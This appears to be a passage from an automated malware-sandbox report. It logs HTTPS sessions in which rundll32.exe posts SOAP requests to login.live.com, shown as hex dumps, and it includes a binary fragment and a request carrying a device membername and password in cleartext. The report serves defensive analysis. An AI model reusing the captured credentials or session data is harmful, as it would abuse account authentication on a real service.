37 30 34 be 37 fb 37 be 37 90 37 be 37 40
                                              Data Ascii: 77d7777t77n7,o7o777777.B77d777!777K7p7.7777h7<71717P17170170707h0707373737X3737037272727275757575747474747P47470477777@
                                              2022-12-13 19:08:55 UTC513INData Raw: d4 58 a6 91 ce 43 ac 91 fd 37 64 d9 f9 37 c8 d1 bd 37 e6 ee fc 61 aa b0 d9 68 a9 bd d1 58 ab 91 ce 43 ac 91 fd 37 c9 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c7 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c8 d1 bd 37 c7 d1 bd 37 c8 d1 bd 37 64 d9 f9 37 c8 d1 bd 37 e6 ee fc 61 f7 f5 de 58 ac b4 de 41 bc 91 f9 73 80 91 ce 43 ac 91 fd 37 64 d9 f9 37 c8 d1 bd 37 e6 ee fc 61 f7 f5 de 43 b1 a1 d8 77 8c 91 ce 43 ac 91 fd 37 64 d9 f9 37 c8 d1 bd 37 e6 ee fc 62 ab a5 c4 47 ad 8e df 56 bb b4 fd 44 bc b5 fd 77 c8 d1 bd 37 64 d9 f9 37 c8 d1 bd 37 e6 ee fc 61 ab be d9 52 ab a7 c9 68 aa b0 ce 52 88 a2 c9 53 88 91 bd 37 64 d9 f9 37 c8 d1 bd 37 e6 ee fc 61 ae b0 de 52 bc 91 d1 58 ab b0 d1 52 88 a2 c9 53 88 91 bd 37 64
                                              Data Ascii: XC7d77ahXC7777777777777777d77aXAsC7d77aCwC7d77bGVDw7d77aRhRS7d77aRXRS7d
                                              2022-12-13 19:08:55 UTC529INData Raw: 0a 0d da ea 87 0c 94 ea da 0c 55 ea 10 0c 1f ea 55 0c 3d ea 41 0c c4 ed a3 0b eb ed 38 0b 59 ed 21 0a 3b ec bd 09 e8 ef 87 09 a4 ef 29 09 46 ee bd 37 c8 51 be 37 60 d1 bd 37 ca e1 ba 06 c5 e0 a4 06 98 e0 d5 06 5c e0 24 06 56 e0 1e 06 7b e0 5f 06 20 e0 4d 06 ff e3 81 05 be e3 c6 05 4a e3 3a 05 46 e3 2e 05 69 e3 bf 04 c3 e2 ac 04 ef e5 8b 03 8c e5 f7 03 98 e5 45 03 35 e5 b2 02 e5 e4 fc 02 8f e4 08 02 10 e4 5e 02 21 e4 44 02 36 e4 b2 01 df e7 a0 01 ef e7 90 01 ff e7 80 01 8f e7 ed 01 93 e7 dd 01 a1 e7 ce 01 b6 e7 04 01 1b e7 50 01 1c e9 66 0f 29 e9 a3 0e 89 e8 ee 0e 96 e8 cf 0d 58 eb e9 0c 4d ea b7 0a 08 ec 77 0a b6 ef 30 09 cc ee ac 08 2e ee 4d 08 c8 41 be 37 a4 d1 bd 37 58 e1 73 07 c8 e0 95 06 c3 e3 a3 05 e7 e3 e9 05 47 e3 1f 05 72 e3 67 05 e5 e2 e8 04 a6
                                              Data Ascii: UU=A8Y!;)F7Q7`7\$V{_ MJ:F.iE5^!D6Pf)XMw0.MA77XsGrg
                                              2022-12-13 19:08:55 UTC545INData Raw: 20 33 28 33 30 33 38 33 40 33 48 33 50 33 58 33 60 33 68 33 70 33 78 33 80 33 88 33 90 33 98 33 a0 33 a8 33 b0 33 b8 33 c0 33 c8 33 d0 33 d8 33 e0 33 e8 33 f0 33 f8 33 00 34 08 34 10 34 18 34 20 34 28 34 30 34 38 34 40 34 48 34 50 34 58 34 60 34 68 34 70 34 9c 3a a0 3a a4 3a 00 00 00 70 02 00 8c 01 00 00 78 34 80 34 84 34 88 34 8c 34 90 34 94 34 98 34 9c 34 a0 34 a4 34 a8 34 ac 34 b0 34 b4 34 b8 34 bc 34 68 35 70 35 78 35 7c 35 80 35 84 35 88 35 8c 35 90 35 94 35 9c 35 a0 35 a4 35 a8 35 ac 35 b0 35 b4 35 b8 35 c4 35 cc 35 d4 35 d8 35 dc 35 e0 35 e4 35 e8 35 ec 35 f0 35 f4 35 f8 35 fc 35 00 36 04 36 08 36 0c 36 10 36 14 36 18 36 1c 36 20 36 24 36 70 36 74 36 78 36 7c 36 80 36 84 36 88 36 8c 36 90 36 94 36 98 36 9c 36 a0 36 a4 36 a8 36 ac 36 b0 36 b4 36 b8
                                              Data Ascii: 3(30383@3H3P3X3`3h3p3x333333333333333334444 4(40484@4H4P4X4`4h4p4:::px44444444444444444h5p5x5|555555555555555555555555555566666666 6$6p6t6x6|666666666666666


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.34972820.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:07 UTC548OUTPOST /RST2.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 3592
                                              Host: login.live.com
                                              2022-12-13 19:09:07 UTC548OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                              2022-12-13 19:09:07 UTC552INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: application/soap+xml; charset=utf-8
                                              Expires: Tue, 13 Dec 2022 19:08:07 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: a8d6ea01-fce3-4368-b4c6-84fcd3ad0218
                                              PPServer: PPV: 30 H: BL02EPF000066D5 V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:07 GMT
                                              Connection: close
                                              Content-Length: 1276
                                              2022-12-13 19:09:07 UTC552INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.34972920.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:08 UTC554OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 7598
                                              Host: login.live.com
                                              2022-12-13 19:09:08 UTC554OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 31 38 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 78 6f 78 7a 74 7a 6f 6f 73 6c 61 71 6e 6a 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 78 58 5a 7a 43 4f 34 4c 47 73 59 49 6e 42 5a 28 41 73 78 56 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 6e 68 73 7a 62 62 68 71 62 76 6e 68 70 61 3c 2f 4f 6c 64 4d
                                              Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>18</BinaryVersion></ClientInfo><Authentication><Membername>02xoxztzooslaqnj</Membername><Password>xXZzCO4LGsYInBZ(AsxV</Password></Authentication><OldMembername>02nhszbbhqbvnhpa</OldM
                                              2022-12-13 19:09:10 UTC561INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: text/xml
                                              Expires: Tue, 13 Dec 2022 19:08:08 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: 15f2ee6e-14e4-4276-8028-137480612981
                                              PPServer: PPV: 30 H: BL02PFC4900240F V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:10 GMT
                                              Connection: close
                                              Content-Length: 17166
                                              2022-12-13 19:09:10 UTC562INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 30 38 34 35 30 41 43 44 44 41 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 34 39 33 35 31 32 36 62 2d 64 33 63 62 2d 34 31 63 30 2d 39 36 34 62 2d 63 33 33 61 38 66 62 30 62 32 39 36 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                              Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>00188008450ACDDA</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="4935126b-d3cb-41c0-964b-c33a8fb0b296" LicenseID="3252b20c-d425-4711
                                              2022-12-13 19:09:10 UTC577INData Raw: 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 38 53
                                              Data Ascii: ://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf8S


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.34973020.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:11 UTC579OUTPOST /RST2.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 3592
                                              Host: login.live.com
                                              2022-12-13 19:09:11 UTC579OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                              2022-12-13 19:09:11 UTC583INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: application/soap+xml; charset=utf-8
                                              Expires: Tue, 13 Dec 2022 19:08:11 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: 0ba3b244-3b57-4c90-8568-badf7e95ea7f
                                              PPServer: PPV: 30 H: BL02EPF00006861 V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:11 GMT
                                              Connection: close
                                              Content-Length: 11297
                                              2022-12-13 19:09:11 UTC583INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.2.34973120.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:11 UTC594OUTPOST /RST2.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 4740
                                              Host: login.live.com
                                              2022-12-13 19:09:11 UTC595OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                              2022-12-13 19:09:12 UTC599INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: application/soap+xml; charset=utf-8
                                              Expires: Tue, 13 Dec 2022 19:08:12 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: edfd7e73-1d0b-4aac-94df-1264dc385e63
                                              PPServer: PPV: 30 H: BL02PF671051CE6 V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:11 GMT
                                              Connection: close
                                              Content-Length: 1962
                                              2022-12-13 19:09:12 UTC600INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.2.34973220.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:12 UTC602OUTPOST /RST2.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 4740
                                              Host: login.live.com
                                              2022-12-13 19:09:12 UTC602OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                              2022-12-13 19:09:13 UTC607INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: application/soap+xml; charset=utf-8
                                              Expires: Tue, 13 Dec 2022 19:08:12 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: 028c205b-4fec-4915-aa07-dac169f5ca66
                                              PPServer: PPV: 30 H: BL02PF2290680EB V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:12 GMT
                                              Connection: close
                                              Content-Length: 11297
                                              2022-12-13 19:09:13 UTC607INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.2.34973320.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:13 UTC618OUTPOST /RST2.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
